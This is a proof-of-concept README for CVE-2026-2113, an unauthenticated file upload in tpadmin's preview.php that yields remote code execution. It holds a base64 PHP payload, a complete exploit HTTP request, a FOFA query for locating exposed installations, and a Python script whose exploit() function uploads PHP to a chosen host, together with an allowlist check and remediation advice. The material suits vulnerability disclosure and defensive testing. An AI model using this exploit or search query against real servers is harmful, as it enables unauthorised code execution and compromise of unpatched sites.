# tpadmin-CVE-2026-2113-poc

A proof-of-concept for CVE-2026-2113: an unauthenticated Arbitrary File Upload in tpadmin that yields Remote Code Execution with web server privileges.

# Vulnerability Description

A critical Remote Code Execution vulnerability exists in the WebUploader preview component bundled with the H-ui.admin frontend that tpadmin ships. The file `/public/static/admin/lib/webuploader/0.1.5/server/preview.php` performs neither authentication nor file validation: it accepts a base64 data URI in the POST body, derives the stored file's extension from the data URI's MIME subtype and writes the decoded content into a web-accessible directory. A body of the form `data:image/php;base64,...` is therefore written out as a `.php` file, so an unauthenticated attacker can upload arbitrary PHP code that the web server then executes. This results in immediate Remote Code Execution with web server privileges.

# Affected Versions

- tpadmin up to version 1.3.12

# Poc (by sTy1H)

1. Construct the payload by base64-encoding the PHP statement to execute (`printf` rather than `echo`, so that no trailing newline is encoded):

```bash
printf '<?php phpinfo();?>' | base64
PD9waHAgcGhwaW5mbygpOz8+
```

2. Send the payload in a POST request to `preview.php`. The body is a data URI whose MIME subtype is `php`. Because the endpoint is unauthenticated, the session cookie in the captured request below is not required:

```http
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
```

The request path depends on the deployment: in the repository the vulnerable file sits at `public/static/admin/lib/webuploader/0.1.5/server/preview.php`, so adjust the path prefix to match the web server's document root.

3. Open the URL returned in the response. The uploaded file is served and executed as PHP; with the payload above, the `phpinfo()` page confirms code execution.

# Into the wild

FOFA query:

```
title='Tpadmin'
```

# Impact

An unauthenticated remote attacker can exploit the Arbitrary File Upload to gain RCE with web server privileges.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

Note that this vector rates the confidentiality, integrity and availability impacts as Low (VC:L/VI:L/VA:L). Arbitrary PHP execution as the web server user typically reaches everything that user can read or write, so assess the severity against your own deployment rather than relying on the published score alone.

# Remediation & Mitigation

No vendor fix or official countermeasure is known at the time of writing. Until one is available, remove the unauthenticated `preview.php` endpoint from the deployed application or block access to it at the web server; replacing the affected component with an alternative product is also an option.
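As an added example that is not part of the original PoC or of the tpadmin project, the following Python script carries the three PoC steps above through one tool and, for the mitigation question, shows the input check that would have rejected the request: it rebuilds the data-URI body from the PHP payload, emits the raw request, extracts the returned URL from the reply, and applies an allowlist check to the same body. The request path (document root assumed to be tpadmin's `public/` directory), the JSON `result` field of the reply and the allowlist of image subtypes are assumptions; the `phpinfo()` sample input is constructed to match the PoC.

```python
"""Added example (not part of the original PoC repository): builds the
preview.php request from the PoC, parses the server's reply, and shows the
input check a defender would apply to the same data URI body."""
import base64
import http.client
import json
import re
from typing import Optional, Tuple

# Path used by the PoC request. Assumption: the web server's document root is
# tpadmin's public/ directory; adjust the prefix for other deployments.
PREVIEW_PATH = "/admin/lib/webuploader/0.1.5/server/preview.php"

# Same shape as the body the PoC sends: data:image/<subtype>;base64,<payload>
DATA_URI_RE = re.compile(r"^data:image/(\w+);base64,(.*)$", re.S)

# Assumed allowlist: the only subtypes a preview endpoint should ever write.
IMAGE_SUBTYPES = {"png", "jpg", "jpeg", "gif", "webp", "bmp"}


def build_payload(php_source: bytes, subtype: str = "php") -> str:
    """Step 1 of the PoC: base64-encode the PHP and wrap it in a data URI whose
    MIME subtype becomes the stored file's extension."""
    b64 = base64.b64encode(php_source).decode("ascii")
    return f"data:image/{subtype};base64,{b64}"


def build_request(host: str, php_source: bytes, path: str = PREVIEW_PATH) -> bytes:
    """Step 2 of the PoC as raw HTTP/1.1 bytes. Only the headers the endpoint
    needs are sent; no cookie, because the endpoint is unauthenticated."""
    body = build_payload(php_source)
    head = "\r\n".join([
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
        "",
        "",
    ])
    return head.encode("ascii") + body.encode("ascii")


def parse_data_uri(body: str) -> Optional[Tuple[str, bytes]]:
    """Split a data URI into (subtype, decoded bytes); None if it does not parse."""
    m = DATA_URI_RE.match(body)
    if not m:
        return None
    subtype, b64 = m.group(1), m.group(2)
    try:
        return subtype, base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None


def is_acceptable_preview(body: str) -> bool:
    """Defender-side check: the subtype must be on the image allowlist and the
    decoded bytes must not open with a PHP tag. Rejects the PoC body."""
    parsed = parse_data_uri(body)
    if parsed is None:
        return False
    subtype, data = parsed
    return subtype.lower() in IMAGE_SUBTYPES and not data.lstrip().startswith(b"<?")


def extract_result_url(response_body: str) -> Optional[str]:
    """Step 3 of the PoC: pull the stored file's URL out of the reply.
    Assumption: the endpoint answers with a JSON object carrying the URL in a
    "result" field, as WebUploader's bundled preview.php does."""
    try:
        doc = json.loads(response_body)
    except json.JSONDecodeError:
        return None
    result = doc.get("result") if isinstance(doc, dict) else None
    return result if isinstance(result, str) else None


def exploit(host: str, php_source: bytes, port: int = 80, path: str = PREVIEW_PATH) -> Optional[str]:
    """Send the request to a target you are authorised to test and return the
    URL of the uploaded file; visiting that URL runs the PHP."""
    body = build_payload(php_source)
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", path, body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return extract_result_url(text)


if __name__ == "__main__":
    # Constructed sample: the PoC's phpinfo() payload, shown offline.
    sample = b"<?php phpinfo();?>"
    print(build_request("127.0.0.1", sample).decode("ascii"))
    print("accepted by allowlist check:", is_acceptable_preview(build_payload(sample)))
```

Run without arguments it only prints the request it would send and the verdict of the allowlist check; `exploit()` performs the actual upload and should be pointed only at systems you are authorised to test. The check in `is_acceptable_preview` is deliberately two-layered: the allowlist stops the `image/php` trick, and the content sniff catches a `.png` name wrapped around PHP source, which matters wherever the web server is configured to run PHP regardless of extension.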
# References

- https://github.com/yuan1994/tpAdmin
- https://www.cve.org/CVERecord?id=CVE-2026-2113
- https://github.com/sTy1H/CVE-Report/blob/main/Remote%20Code%20Execution%20Vulnerability%20in%20Tpadmin%20System.md